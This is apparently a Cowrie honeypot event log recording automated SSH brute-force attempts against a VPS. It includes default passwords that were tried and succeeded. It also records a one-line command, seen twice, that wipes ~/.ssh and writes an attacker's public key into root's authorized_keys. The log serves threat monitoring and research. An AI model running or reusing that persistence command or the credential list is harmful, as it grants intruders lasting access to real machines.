{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:45:55.915280Z","src_ip":"46.101.8.63","session":"92221ca3a40e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:45:55.937352Z","src_ip":"46.101.8.63","session":"92221ca3a40e"}
{"eventid":"cowrie.login.failed","username":"public","password":"public","message":"login attempt [public/public] failed","sensor":"my-vps","timestamp":"2025-09-08T23:45:56.066232Z","src_ip":"46.101.8.63","session":"92221ca3a40e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:57.091584Z","src_ip":"46.101.8.63","session":"92221ca3a40e"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":42936,"dst_ip":"1.2.3.4","dst_port":22,"session":"26a0b3daabbf","protocol":"ssh","message":"New connection: 93.113.63.124:42936 (1.2.3.4:22) [session: 26a0b3daabbf]","sensor":"my-vps","timestamp":"2025-09-08T23:46:01.502168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:01.503146Z","src_ip":"93.113.63.124","session":"26a0b3daabbf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:01.573811Z","src_ip":"93.113.63.124","session":"26a0b3daabbf"}
{"eventid":"cowrie.login.failed","username":"master","password":"master","message":"login attempt [master/master] failed","sensor":"my-vps","timestamp":"2025-09-08T23:46:01.984440Z","src_ip":"93.113.63.124","session":"26a0b3daabbf"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:03.059016Z","src_ip":"93.113.63.124","session":"26a0b3daabbf"}
{"eventid":"cowrie.session.connect","src_ip":"43.224.126.107","src_port":24239,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c124d45a737","protocol":"telnet","message":"New connection: 43.224.126.107:24239 (1.2.3.4:23) [session: 7c124d45a737]","sensor":"my-vps","timestamp":"2025-09-08T23:46:03.156356Z"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":56836,"dst_ip":"1.2.3.4","dst_port":22,"session":"61e7fbc54b92","protocol":"ssh","message":"New connection: 182.18.161.165:56836 (1.2.3.4:22) [session: 61e7fbc54b92]","sensor":"my-vps","timestamp":"2025-09-08T23:46:10.182396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:10.183366Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:10.428841Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.login.success","username":"root","password":"Cn123456","message":"login attempt [root/Cn123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:46:11.451821Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:46:12.016303Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.016985Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.017727Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.264412Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":60092,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ba78be7c16e","protocol":"ssh","message":"New connection: 45.150.34.92:60092 (1.2.3.4:22) [session: 3ba78be7c16e]","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.700425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.701535Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.718920Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:46:12.774297Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.775064Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.login.success","username":"root","password":"He@123456","message":"login attempt [root/He@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.831535Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:46:12.914624Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.915866Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.916965Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.935462Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:46:12.987018Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:46:12.987855Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.007488Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.008296Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.022288Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.023149Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":60104,"dst_ip":"1.2.3.4","dst_port":22,"session":"efa871085db9","protocol":"ssh","message":"New connection: 45.150.34.92:60104 (1.2.3.4:22) [session: efa871085db9]","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.024089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.024757Z","src_ip":"45.150.34.92","session":"efa871085db9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.041939Z","src_ip":"45.150.34.92","session":"efa871085db9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.151639Z","src_ip":"45.150.34.92","session":"efa871085db9"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":56846,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e3e5e5c790a","protocol":"ssh","message":"New connection: 182.18.161.165:56846 (1.2.3.4:22) [session: 7e3e5e5c790a]","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.266251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.267195Z","src_ip":"182.18.161.165","session":"7e3e5e5c790a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:13.511665Z","src_ip":"182.18.161.165","session":"7e3e5e5c790a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:14.170400Z","src_ip":"45.150.34.92","session":"efa871085db9"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":60114,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebba3d535a5d","protocol":"ssh","message":"New connection: 45.150.34.92:60114 (1.2.3.4:22) [session: ebba3d535a5d]","sensor":"my-vps","timestamp":"2025-09-08T23:46:14.188467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:14.189070Z","src_ip":"45.150.34.92","session":"ebba3d535a5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:14.206593Z","src_ip":"45.150.34.92","session":"ebba3d535a5d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:46:14.315660Z","src_ip":"45.150.34.92","session":"ebba3d535a5d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:14.334575Z","src_ip":"45.150.34.92","session":"3ba78be7c16e"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:14.335386Z","src_ip":"45.150.34.92","session":"ebba3d535a5d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:46:14.532200Z","src_ip":"182.18.161.165","session":"7e3e5e5c790a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:15.779403Z","src_ip":"182.18.161.165","session":"7e3e5e5c790a"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":56858,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae35f9cb4bda","protocol":"ssh","message":"New connection: 182.18.161.165:56858 (1.2.3.4:22) [session: ae35f9cb4bda]","sensor":"my-vps","timestamp":"2025-09-08T23:46:16.031967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:16.032809Z","src_ip":"182.18.161.165","session":"ae35f9cb4bda"}
